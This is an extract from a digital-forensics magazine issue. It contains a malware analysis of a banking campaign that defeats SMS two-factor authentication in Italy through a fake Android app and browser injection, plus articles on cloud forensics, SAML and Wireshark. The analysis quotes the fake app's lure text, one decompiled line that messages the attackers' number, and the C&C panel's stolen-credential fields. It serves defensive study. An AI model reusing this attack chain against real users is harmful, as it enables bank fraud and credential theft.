Java, dyslexia, cancer, and security; he is even referenced on one of the most fundamental patents in technology and has been

involved in the search for the missing MH370 aircraft. Colin has two incredibly smart and intelligent children; Michael and Olivia;

who he loves very much. He would like to thank his co-author and best friend Iana; her lovely sister Taina, brother Tiago, mother

Marciaa, and father Jose. What more is there to say, but thank you Red Bull.

Iana Fareleiroworks as an analyst as part of a fraud and compliance team for a payments card business and is studying a post-

graduate cybersecurity and cybercrime course. Originally from Brazil, and having lived in Mozambique, South Africa and Zimba-

bwe, and eventually Portugal; she now lives in the UK in Peterborough. She is a movie buff of old, and a scientist at heart who

gets great enjoyment out of intellectual argument with like-minded individuals. She would like to thank her sister Taina, brother

Tiago, mother Marciaa, and father Jose; and boyfriend Luis.



ARE 2 FACTOR

AUTHENTICATIONSENOUGH TO PROTECTYOUR MONEY?TARGETING ITALIAN BANK AND CUSTOMERS

by Davide Cioccia and Senad Aruch

During last few years banks, and different financial institutions,

have been trying to protect or prevent fraud and cyber-attacks

from accessing their customers credentials. They increased

security and login factors to avoid these kind of problems. One

of these is the Two Factor Authentication (2FA), used to help

username and password to protect the bank account.

However today, this system is hackable by malicious users. Trend Microssaid:The aack is designed to bypass a certain two-factor authencaon

scheme used by banks. In parcular, it bypasses session tokens, which arefrequently sent to users mobile devices via Short Message Service (SMS).

Users are expected to enter a session token to acvate banking sessionsso they can authencate their idenes. Since this token is sent through a

separate channel, this method is generally considered secure.

This article is a real User Case of this kind of malicious software. Duringour recent malware analysis targeting Italian financial institutions, we founda very powerful piece of it that can bypass the 2FA with a malicious app in-

stalled on the phone. Malware like this can drive the user to download thefake application on their phone from the official Google Play Store, using aMan in the browser attack (MITB). Once on the users PC, the attacker cantake full control of the machine and interact with him through a Command andControl (C&C) server. What we explain in this article is a real active botnetwith at least 40-compromised zombie hosts.

What you will learn:

How the financial cybercrime is

evolving

How the new security solutions

mobile-based are bypassed

How the attacker can control and

steal your money

What you should know:

A basic knowledge of how the two

factor authentication works

Familiarity with Android/iOS app

requirements

What is a MITB attack



HOW THE 2FA IS BYPASSEDDuring the last few days, we are seeing criminals developing more sophisticated solutions and haveincreasing knowledge in mobile and web programming. This scenario is increasing throughout the en-tire world; though concentrated mostly in Europe. Criminals are developing solutions to bypass the 2FAused by the 90% of banks developing legal application published in the Google Play Store and Apple

App Store.These applications can steal information on the phone, intercept and send it over the networksilently. The last operation named Operation Emmenthal, discovered by Trend Micro is acting in just thisway. In this section, we will discover how a criminal can force a user to download and install the mobileapplication.

When malware infects the machine, and the user navigates to the online banking platform, a MITB at -tack starts injecting JavaScript code inside the browser. This injection modifies some data in the pagewhile keeping the same structure. During the navigation the hacked website will invite the user to down-load the fake application, explaining all the steps to insert their bogus data. The app can be downloadedin two different ways:

SMS (inserting your number in the fake form you will receive an SMS with the download link from the store)

Here a screenshot of a received SMS. The fake app name remember many programs used to encryptand share sensitive information. People can trust this app because of the name.

Figure 1.Sms sent by attackers to download the apk

QR CODEA QR Code is showed with a MITB attack, during the online banking website navigation. Here, a screen-shot of the image is used to redirect the user on the Google Play Store.



Figure 2.QR Code used to download the apk

A case of QR codes is reported by Trend Micro in this image. When the users did not use the SMS orthe link inside the web page a QR-code appears. Scanning it with any QR reader in the store, the userwill be redirect to the Google Play Store to download the app.

Figure 3.

Every single pass is given by the attackers as reported below:

STEP ONEWhen the Google Play Store is opened, click on the install button and Accept the app authorization.Right are requested to send, receive, intercept, SMS, and read/write on the file system.



Figure 4.

Description provided by attackers:

Secure sms transmission with asymmetric encryption, totaly automaticaly. Totaly secure sms.

Private-key infrastructure (PKI). Comfortable and easy use, one time installation. This application is created to protect sensetive data received over sms. Even if the sms is intersepted nothing can be reached from the encrypted text. The encrypted text can only be decrypted by your personal private key, generated just after the

rst launch. Each key is unique and has its own identication number.

Functionality:

A Keypair is created after rst launch. A unique identication number is granted.

With the Private Key you decrypt messages, received from the trusted saurses. Send your Private Key Identiction Number to the organization which wants to send you an encrypt-

ed message. The organization encrypts the message with your Private Key and sends the encrypt -ed message to you. ONLY YOU can decrypt the encrypted Message with your Private Key.

Instruction:

Doqnload and install the app. Launch the aplication. Waint till your private kay is generated. Share your Private Key identication number.

The description is full of orthographic errors, and this means that they are not from an English- speak-ing country.



Analyzing the -apk and decompiling it we found the rights requested by the malicious app.

STEP TWOOnce installed, you need to open the app on your phone to see a Random Number Generator. Usersneed to insert this user inside the online banking account to login inside the portal. Trend Micro says:

At this stage, the users have to enter the password that was generated by the fake app. The app hasa preset list of possible passwords and just randomly chooses one. The Web page, meanwhile, simply

checks if one of those possible passwords was entered. Guessing numbers does not work, the users willnot be able to proceed with the fake banking authencaon.

Figure 5.

Installing the Android app allows the attackers to gain full control of the users online banking sessionsbecause, in reality, it intercepts session tokens sent via SMS to users phones, which are then forward-ed to the cybercriminals. The spoofed website allows the attackers to obtain the users login credentialswhile the mobile app intercepts real session tokens sent by the banks. As a result, the attackers obtaineverything they need to fake users online banking transactions.

The app waits for an SMS from the user bank, which provides a OTP or a legitimate token .tok. Whenthey are received, the app hijacks the communication in the background and forwards the stolen data toa number with an encrypted SMS.

Here a decompiled piece of code used to test the availability of the server:

Settings.sendSms(this, new MessageItem(+39366134xxxx, Hello are you there?))

Communication start with a simple SMS, requesting service availability. When an SMS is received froma bank number, the interception starts, and an encrypted sms is sent with the stolen information.



C&C CENTER FUNCTION DETAILSDuring our code analysis we found a link to a JavaScript file used by criminals during the injection pro-cess in the MITB attack. Going deeply into the obfuscated code, we found a link to a C&C server wheredata is sent. Behind the front-end, which was password protected, we saw a custom control panel usedto control the botnet. Every single bot is represented in a table and is controlled with the panel. The first

screen you can see behind the login panel is a statistic page with the number of compromised hosts.

Figure 6.

In the second one (Logs), there is all the information about the bots. Every single user is cataloged withthese parameters:

Used browser Last operation on that bot IP Login Password User Type (le, ash)

PIN Action (request data login)

As you can see in the panel showed below, in the C&C Server attackers have all that they need to ac-cess an online banking website with stolen credentials. This panel is very powerful because can performa request to the infected user to insert another time in his credentials.

Figure 7.



Clicking on the icons on the right, it is possible to send the request to a bot.

Figure 8.

Analyzing every single bot it is possible to see more details about them; this, by clicking on the PIN.

The third page is the JS page, used by the attacker to inject code inside the bot browser. To enable theform, there is a hidden command discovered through the JavaScript code analysis of that page.

Figure 9.

The fourth section is the jabber page, where an attacker can change his XMPP username and pass -word, and the last page is dedicated to set the password for this panel.

Figure 10.



Figure 11.

CONCLUSIONThe platform used by this hacker is very powerful because it is not only a drop-zone where data is sent,but it is a real C&C server. They can interact with malware and can send it commands to execute on theinfected machine. This kind of methodology is increasing every day and the attackers have more so-phisticated resources like a Windows malware, a malicious Android app, a rogue DNS resolver server,a phishing Web server with fake bank site pages, and a compromised C&C server. Banks that use thiskind of authentication are exposing users to rogue app.

Today there are a more secure ways to access an online banking portal, like card readers, TAN, Multi-ple factor authentication, but they are more sophisticated and slow.

We want to move fast, without any single problem and slowdown.

But this is good for our online bank account?

STATISTICSThe attack is alive and the number of the hacked users is increasing every day. We have detected morethan 40 hacked hosts and accounts until now.

REFERENCEShttp://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf

ABOUT THE AUTHORSDavide Ciocciais a Security Consultant at Reply s.p.a Communication Valley Security Operations Center in Italy. Msc in

Computer Engineering with Master Thesis about a new way to combat the Advanced Persistent Threat and Microsoft Certified

Professional (MCP,MS) he carried out many article about the financial cybercrime, botnet, drop zone and APT.

Key assignments include anti-fraud management, Anti-Phishing services for financial institute, Drop Zone and Malware Analy-

sis, Cyber Intelligence platform development.

E-Mail: [email protected]

Twitter: https://twitter.com/david107

LinkedIn: https://www.linkedin.com/in/davidecioccia

Senad Aruch. Multiple Certified ISMS Professional with 10-year background in: IT Security, IDS and IPS, SIEM, SOC, Network

Forensics, Malware Analyses, ISMS and RISK, Ethical Hacking, Vulnerability Management, Anti Fraud and Cyber Security.

E-Mail: [email protected]

Blog: www.senadaruc.comTwitter: https://twitter.com/senadaruch

LinkedIn: https://www.linkedin.com/in/senadaruc
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdfhttp://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdfmailto:[email protected]://twitter.com/david107https://www.linkedin.com/in/davideciocciamailto:[email protected]://www.senadaruc.com/https://twitter.com/senadaruchhttps://www.linkedin.com/in/senadaruchttps://www.linkedin.com/in/senadaruchttps://twitter.com/senadaruchhttp://www.senadaruc.com/mailto:[email protected]://www.linkedin.com/in/davideciocciahttps://twitter.com/david107mailto:[email protected]://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf



AN OVERVIEW OF

CLOUD FORENSICSby Dejan Lukan

When discussing cloud forensics, were actually talking about

the intersection between cloud computing and network

forensic analysis. Cloud computing basically refers to a network

service that we can interact with over the network; this usuallymeans that all the work is done by a server somewhere on

the Internet, which might be backed up by physical or virtual

hardware. In recent years, there has been a significant increase

on the use of virtualized environments, which makes it very

probable that our cloud service is running somewhere in a

virtualized environment.

There are many benefits of virtualized servers, which we wont go intonow, but the most prominent ones are definitely low cost, ease of use,and the ability to move them around in seconds without service down-

time. Basically, cloud computing is just a fancy term created by marketingpeople, but weve all been using it for years. A good example of cloud com-puting is an email service where we dont have to install an email client on our

local computer to access our new email and which serves as storage for allemail. Instead, everything is already done by the cloud, the email messagesare stored on the cloud and, even if we switch to a different computer, we on-ly need to login with our web browser and everything is there. Therefore, weonly need an interface with which we can access our cloud application, whichin the previous example is simply a web browser. Cloud computing has manybenefits, but the two most distinct disadvantages are definitely security andprivacy. Since we store all data in our cloud somewhere on the Internet, thecloud provider has access to our data, and so does an attacker if a breachoccurs in the providers network.

Network forensic analysis is part of the digital forensics branch, which

monitors and analyzes computer network traffic for the purposes of gath-ering information, collecting legal evidence, or detecting intrusions [1].When talking about network forensics, were actually talking about the datathat has been transmitted over the network, which might serve as the onlyevidence of an intrusion or malicious activity. Obviously thats not alwaysthe case, since an intruder often leaves evidence on the hard disk of the



compromised host as well in the form of log files, uploaded malicious files, etc. But when the attackeris very careful not to leave any traces on the compromised computer, the only evidence that we mighthave is in the form of captured network traffic. When capturing network traffic, we most often want toseparate the good data from the bad by extracting useful information from the traffic, such as transmit-ted files, communication messages, credentials, etc. If we have a lot of disk space available, we can

also store all the traffic to disk and analyze it at a later time if needed, but obviously this requires agreat amount of disk space. Usually we use network forensics to discover security attacks being con-ducted over the network. We can use a tool like tcpdumpor Wireshark to perform network analysis onthe network traffic.

CLOUD COMPUTINGLets talk a little bit about deployment models of cloud computing, which are described below (summa -rized after [2]):

Private cloud The services of a private cloud are used only by a single organization and are notexposed to the public. A private cloud is hosted inside the organization and is behind a rewall, sothe organization has full control of who has access to the cloud infrastructure. The virtual machines

are then still assigned to a limited number of users. Public cloud The services of a public cloud are exposed to the public and can be used by anyone.Usually the cloud provider offers a virtualized server with an assigned IP address to the customer.

An example of a public cloud isAmazon Web Services(AWS). Community cloud The services of a community cloud are used by several organizations to lower

the costs, as compared to a private cloud. Hybrid cloud The services of a hybrid cloud can be distributed in multiple cloud types. An example of

such a deployment is when sensitive information is kept in private cloud services by an internal appli-cation. That application is then connected to the application on a public cloud to extend the applicationfunctionality.

Distributed cloud The services of a distributed cloud are distributed among several machines atdifferent locations but connected to the same network.

The service models of cloud computing are the following (summarized after [2]):

IaaS (infrastructure as a service) provides the entire infrastructure, including physical/virtual ma-chines, rewalls, load balancers, hypervisors, etc. When using IaaS, were basically outsourcing acomplete traditional IT environment where were renting a complete computer infrastructure that canbe used as a service over the Internet.

PaaS (platform as a service) provides a platform such as operating system, database, web server,etc. Were renting a platform or an operating system from the cloud provider.

SaaS (software as a service) provides access to the service, but you dont have to manage it be-cause its done by the service provider. When using SaaS, were basically renting the right to use anapplication over the Internet.

There are also other service models that we might encounter:

Desktop as a service Were connecting to a desktop operating system over the Internet, which en-ables us to use it from anywhere. Its also not affected if our own physical laptop gets stolen, be-cause we can still use it.

Storage as a service Were using storage that physically exists on the Internet as it is present lo-cally. This is very often used in cloud computing and is the primary basis of a NAS (network at -tached storage) system.

Database as a service Here were using a database service installed in the cloud as if it was in-stalled locally. One great benet of using database as a service is that we can use highly congur-able and scalable databases with ease.

Information as a service We can access any data in the cloud by using the dened API as if it waspresent locally.

Security as a service This enables the use of security services as if they were implemented locally.

There are other services that exist in the cloud, but weve presented just the most widespread ones thatare used on a daily basis.
http://www.tcpdump.org/http://aws.amazon.com/http://aws.amazon.com/http://www.tcpdump.org/



If we want to start using the cloud, we need to determine which service model we want to use. The de-cision largely depends on what we want to deploy to the cloud. If we would like to deploy a simple webapplication, we might want to choose an SaaS solution, where everything will be managed by the serviceprovides and we only have to worry about writing the application code. An example of this is writing anapplication that can run on Heroku.

We can think of the service models in the term of layers, where the IaaS is the bottom layer, which givesus the most access to customize most of the needed infrastructure. The PaaS is the middle layer, whichautomates certain things, but is less configurable. The top layer is SaaS, which offers the least configura-tion, but automates a large part of the infrastructure that we need when deploying an application.

CLOUD NETWORK FORENSICSThe first thing that we need to talk about is defining why cloud network forensics is even necessary. Theanswer to that is rather simple: because of attackers trying to hack our cloud services. We need to benotified when hackersare trying to gain access to our cloud infrastructure, platform, or service. Letslook at an example. Lets imagine that company X is running a service Y in the cloud; the service is veryimportant and has to be available 24/7. If the service is down for a few hours, it could mean a consider-

able financial loss for Xs site. When such an attack occurs, the company X must hire a cloud forensicsexpertto analyze the available information. The forensic analyzer must look through all the logs on thecompromised service to look for forensic evidence. The forensics analyzer soon discovers that the at-tack was conducted from the cloud providers network, so he asks the cloud provider to give him the logsthat he needs.

At this point, we must evaluate what logs the forensics investigator needs in order to find our whowas behind the attack. This is where cloud network forensics comes into play. Basically, we need totake the digital forensics process and apply it to the cloud, where we need to analyze the informationwe have about filesystems, processes, registry, networktraffic, etc. When collecting the information thatwe can analyze, we must know which service model is in use, because collecting the right informationdepends on it.

When using different service models, we can access different types of information, as is shown in thetable below [3,4]. If we need additional information from the service model that were using, which arenot specified in the table below, we need to contact the cloud service provider and they can send us therequired information. The table below presents different columns, where the first column contains differ-ent layers that we might have access to when using cloud services. The SaaS, PaaS, and IaaS columnsshow the access rights we have when using various service models and the last column presents theinformation we have available when using a local computer that we have physical access to.

Information SaaS PaaS IaaS Local

Networking

StorageServers

Virtualization

OS

Middleware

Runtime

Data

Application

Access Control

Its evident from the table that, when using a local computer, we have maximum access, which is whythe analysis of a local machine is the most complete. I intentionally didnt use the term easiest, becausethats not true, since when we have maximum access to the computer, there are multiple evidences thatwe can collect and analyze. The problem with cloud services is that the evidence needs to be providedby the CSP (cloud service provider): If we want to get application logs, database logs, or network logs
http://www.infosecinstitute.com/courses/ethical_hacking_training.htmlhttp://www.infosecinstitute.com/courses/computer_forensics_training.htmlhttp://www.infosecinstitute.com/courses/computer_forensics_training.htmlhttp://www.infosecinstitute.com/courses/computer_forensics_training.htmlhttp://www.infosecinstitute.com/courses/computer_forensics_training.htmlhttp://www.infosecinstitute.com/courses/ethical_hacking_training.html



when using the SaaS service model, we need to contact the service provider in order to get it, becausewe cant access it by ourselves. Another problem is that the users data is kept together with the data ofother users on the same storage system, so its hard to separate just the data that we need to conductan analysis. If two users are using the same web server for hosting a web page, how can we prove thatthe servers log contains the data of the user that were after? This is quite a problem when doing a fo-

rensic analysis of the cloud service.

Lets describe every entry from the table above, so it will make more sense.

Networking In a local environment, we have access to the network machines, such as switches,routers, IDS/IPS systems, etc. We can access all of the trafc passing through the network and ana-lyze it as a part of gathering as much data as we possibly can. When using the cloud, even the CSPdoesnt have that kind of data, because it mustnt log all the trafc passing through the network,since users data is condential and CSP cant record, store, and analyze it. The CSP might only ap-ply the IDS/IPS solution to the network, which is only analyzing trafc for malicious behavior andalerting the provider of such activity.

Storage When we have hardware access to the machine, we know exactly where the data is locat-

ed but, when using a cloud service, the data could be anywhere, even in different states, countries,or even continents. Servers In a traditional system, we have physical access to the machine, which is why we can ac-

tually go to the machine and analyze the data on it; all the data is local to the machine. This isntpossible when using the cloud, because the data is dispersed through multiple data centers and itshard to conrm that weve actually collected all the needed data.

Virtualization In a local environment, we have access to the virtualization environment, where wecan access the hypervisor, manage existing virtual machines, delete a virtual machine, or create anew virtual machine. In the public cloud, we normally dont have access to the hypervisor, but if weabsolutely must have access, we can run a private cloud.

OS In a local environment, we have complete access to the operating system as we do in the IaaSmodel, but not in the PaaS and SaaS models. If we want access to the operating system, we could

connect to the SSH service running on the server and issue OS commands, which we cant dowhen using Heroku, for example. Middleware The middleware connects two separate endpoints, which together form a whole appli-

cation. For example, we might have a database running on a backend systems and the web applica-tion connects to those databases by using different techniques.

Runtime When using the IaaS model, we can inuence how the application is started and stopped,so we have access to its runtime.

Data/application In PaaS and IaaS models, we have access to all of the data and applications,which we can manage by using search, delete, add, etc. We cant do that directly when using theSaaS model.

Access control In all service models, we have access to the access control because, without it, wewouldnt have been able to access the service. We can control how access is granted to different

users of the application.

When conducting forensic analysis in the traditional way, we can simply hire a forensics expert to collectall the data and analyze it from the local machine. In a cloud service, we can do the same, but we mustalso cooperate with the cloud service provider, which might not have the forensics experts available orsimply might not care and therefore wont provide us with all the data that we need.

CONCLUSIONIn this article, weve seen that, when conducting a cloud network forensic analysis, we do not have ac-cess to the same information as we do when conducting an analysis of a normal local computer system.We often do not have access to the information that were after and must ask the cloud service providerto furnish the information we need. The problem with such data is that we must trust the cloud service

provider to give us the right information; they might give us false information or hold back some very im-portant information. This is just another problem when trying to use the data in court, because we mustprove without a doubt that the evidence from the collected data belongs to the user; the process of col-lecting the data, preserving it, and analyzing it must be documented and acceptable in the court of law.


26/72


27/72



It has become increasingly obvious that usernames and passwords are ineffective ways of authenticat-ing access, yet their use is still widespread as users balk at more cumbersome forms of authenticationlike tokens and certificates. While simple user names and passwords are no longer effective, the amountof data stored in the cloud continues to escalate. Cloud providers must accommodate access to millionsof users from all over the world. A centralized breach in a cloud-based solution would pose a serious risk

to the data of thousands if not more organizations. Therefore, end-users should select cloud provid -ers that offer strong, flexible security that is extremely hard to compromise yet easy to use.

A CENTRALIZED SECURITY APPROACHIn light of the increasing need for stronger security for cloud access, businesses have begun to implementstandards for authenticating users. One of the major problems organizations face is how to manage useridentities in the cloud. To manage cloud identities, IT departments must often maintain an additional set ofuser credentials for each and every cloud solution used by their employees. This approach requires cum-bersome procedures and extra work for IT. To bypass this problem, IT should use a centralized method thatgives each user a single identity that provides access to a variety of different cloud solutions.

A centralized method like this ensures that those who access an organizations assets have been pre-

qualified. It provides strong authentication while also freeing end-users from being dependent on specificsoftware, hardware or features for greater flexibility and convenience.

SAVING TIME WITH SAMLWith the ability to allow secure Web domains to exchange user authentication and authorization data,Security Assertion Markup Language, or SAML, is one way to provide effective and easy identity man-agement in the cloud. A SAML setup requires three roles: the end-user, the service provider and the iden-tity provider. The service provider role is held by cloud solutions, such as Microsoft Office 365, Salesforceor Google Apps. The identity provider role handles user authentication and identity management for theservice provider, and can be used as a centralized system to handle authentication and identity manage-ment for multiple service providers at once. By using a SAML identity provider, organizations can gain allthe recognized benefits that are traditionally associated with on-premise authentication solutions.

SAML frees organizations from having to maintain multiple instances of user credentials, one in the lo-cal area network (LAN) and multiple in the cloud. In this way, SAML is a time saver. This way, the organi-zation can keep its authentication and security mechanisms the same for all users, regardless of whetherthey are accessing data in the cloud or on the LAN, thus saving time and money while boosting security.

MAKE SECURE AUTHENTICATION YOUR GOALCloud services offer convenient remote access to organizations, but they can also open the door foridentity theft if the cloud security system relies on outdated methods such as usernames and passwords.The threat is real, and growing, so organizations must scrutinize the security that a cloud provider offersbefore closing a deal and make secure, authenticated cloud access for end-users their goal regardlessof whether its offered by the cloud provider. For their part, cloud providers must make it their goal to cre-

ate a secure and easy-to-use authentication method. The stakes are too high not to.

ABOUT THE AUTHORDavid Hald is a founding member of SMS PASSCODE A/S, where he acts as a liaison and a promoter of the

award-winning SMS PASSCODE multi-factor authentication solutions. Prior to founding SMS PASSCODE

A/S, he was a co-founder and CEO of Conecto A/S, a leading consulting company within the area of mo-

bile- and security solutions with special emphasis on Citrix, Blackberry and other advanced mobile solutions.

In Conecto A/S David has worked with strategic and tactic implementation in many large IT-projects. David

has also been CTO in companies funded by Teknologisk Innovation and Vkstfonden. Prior to founding

Conecto, he has worked as a software developer and project manager, and has headed up his own software

consulting company. David has a technical background from the Computer Science Institute of Copenhagen

University (DIKU).



PACKET ANALYSIS

WITH WIRESHARK ANDPCAP ANALYSIS TOOLSby Eric A. Vanderburg

Almost every computer today is connected. Their communicationwith others takes the form of packets which can be analyzed to

determine the facts of a case. Packet sniffers are also called as

network analyzers as it helps in monitoring every activity that is

performed over the Internet. The information from packet sniffing

can be used to analyze the data packets that uncover the source

of problems in the network. The important feature of packet

sniffing is that it captures data that travels through the network,irrespective of the destination. A log file will be generated at the

end of every operation performed by the packet sniffer and the

log file will contain the information related to the packets.

Every packet has a header and body, where the header contains infor-mation about the source of the packet and the body contains the actualinformation about the transfer. There are packet sniffer tools that are

available online and many of them are open source tools and hence they areavailable free of cost. How, when and where should this be performed to col-lect the best data in a defensible manner? Attend this workshop to find out.

WHAT IS PACKET ANALYSIS?Investigations cannot always be contained to a single computer, especiallywith the way systems are connected these days. Right now, your computermay be connected to dozens of different computers, some to check for soft-

ware updates, others to gather tweets, email, or RSS feeds. Some connec-tions could be used to authenticate to a domain or access network resources.Now consider an investigation and the potential importance this informationcould have to it.



Network communication over an Internet Protocol (IP) network can best be understood as a set ofpackets that form a communication stream. A machine may send and receive thousands of packets perminute and computer networks are used to send these packets to their destination. Packet capture toolscan be used to analyze this communication to determine how a computer or user interacted with otherdevices on the network. Packet analysis can capture these packets so that they can be reviewed to de-

termine what communication took place.

Packet analysis is called as packet sniffing or protocol analysis. A tool that is used for packet analysis iscalled packet sniffer or packet capture tool. It captures raw data across the wire which helps in analyzingwhich parties are communicating on the network, what data is flowing, how much data is being transmit-ted and what network services are in use.

PACKET SNIFFING PROCESSPacket sniffing can be divided into three steps. The first step is collection when the software gathers alldata traversing the network card it is bound to. Next, the data is converted to a form that the program canread and lastly, the program presents the data to be analyzed and can perform pre-programmed analy-sis techniques on the data.

OSI NETWORK MODELBefore you can analyze packets, you need to understand how network communication takes place.The OSI network model is a conceptual framework that describes that activities performed to communi-cate on a network.

TOOLSThere are various packet sniffing tools available on the market. Some popular packet capture tools in -clude Wireshark, Network Miner and NetWitness Investigator, which we will see in detail. All three ofthese tools are free to download and use and they can be operated in both command line program for-mat and GUI format.

Of the three, Wireshark is the most popular packet sniffer tool that is used worldwide for its ease ofinstallation, ease of use, etc. More importantly, it is an open source tool that is available free of cost.The tool also provides advanced options that will enable forensic investigator or network administratorsto delve deep in the packets and capture information. It supports operating systems and numerous pro-tocols, and media types.

There are numerous packet sniffer tools available for network administrators to analyze and under-stand the traffic flow across the network. It is always difficult to zero down on the best of the lot as almostof them perform required functions seamlessly. Still, there are factors in which they can be ranked andclassified as the top packet sniffing tools. The following three tools are identified to be the best in the mar-ket, already serving millions of computers from identifying serious threats. Lets get in detail with each ofthe three packet sniffing tools and understand why they are ranked in such order.

WIRESHARKWireshark is a popular open source packet sniffer that performs functions such as network troubleshooting,data analysis, protocol development, etc. The tool uses latest available platforms and forensic investigatoror network administrator interface toolkit for serving network administrators. The development version ofWireshark uses Qt while the current releases use GTK+ toolkit. The major advantage of using Wiresharkis that it supports multiple platforms, operating systems and protocols. Wireshark comes in both graphi-cal forensic investigator or network administrator interface format and command mode format. Wiresharkincludes network interface controllers that make it possible for the traffic flowing across the network to becaptured via packets. Otherwise, only specified data that is routed to a destination will be captured.

Wireshark supports various protocols and media types. The approximate number of protocols sup-

ported by Wireshark is more than 900, and this count goes on increasing as and when an update is re-leased. The primary reason for the increase in count of supported protocols is the open source natureof the tool. Developer has the freedom to develop code for including their new protocol

eforensics open 2014-2

Documents